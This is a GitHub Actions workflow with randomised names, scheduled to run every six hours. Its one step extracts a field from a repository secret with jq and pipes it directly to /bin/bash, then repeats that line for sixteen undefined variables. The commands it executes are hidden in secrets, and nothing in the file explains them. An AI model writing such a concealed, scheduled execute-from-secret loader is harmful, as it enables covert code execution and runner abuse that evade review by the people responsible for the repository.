name: woryya
on:
  workflow_dispatch:
  schedule:
    - cron: '28 2/6 * * *'
jobs:  # 30981
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: woryya
        env:
          lrw326: ${{ secrets.lrw326 }}
        run: |
          echo $lrw326 | jq -r .g91 | /bin/bash
          echo $pex658 | jq -r .p35301 | /bin/bash
          echo $mo0 | jq -r .f4 | /bin/bash
          echo $wftt980 | jq -r .rwhn0134 | /bin/bash
          echo $g61 | jq -r .p24270 | /bin/bash
          echo $olee0 | jq -r .sdp579 | /bin/bash
          echo $idvuo6 | jq -r .cbrvl0 | /bin/bash
          echo $nbw0 | jq -r .pm585 | /bin/bash
          echo $bni12629 | jq -r .ilu66 | /bin/bash
          echo $luluy1 | jq -r .rew670 | /bin/bash
          echo $sb69 | jq -r .wlowu81279 | /bin/bash
          echo $lki990 | jq -r .qpen187 | /bin/bash
          echo $jjz5534 | jq -r .ie5886 | /bin/bash
          echo $gtrjs33 | jq -r .pkefy97016 | /bin/bash
          echo $nqefn8 | jq -r .nwaah619 | /bin/bash
          echo $rorqb11327 | jq -r .xpt396 | /bin/bash
          echo $kisf2120 | jq -r .cccz31 | /bin/bash

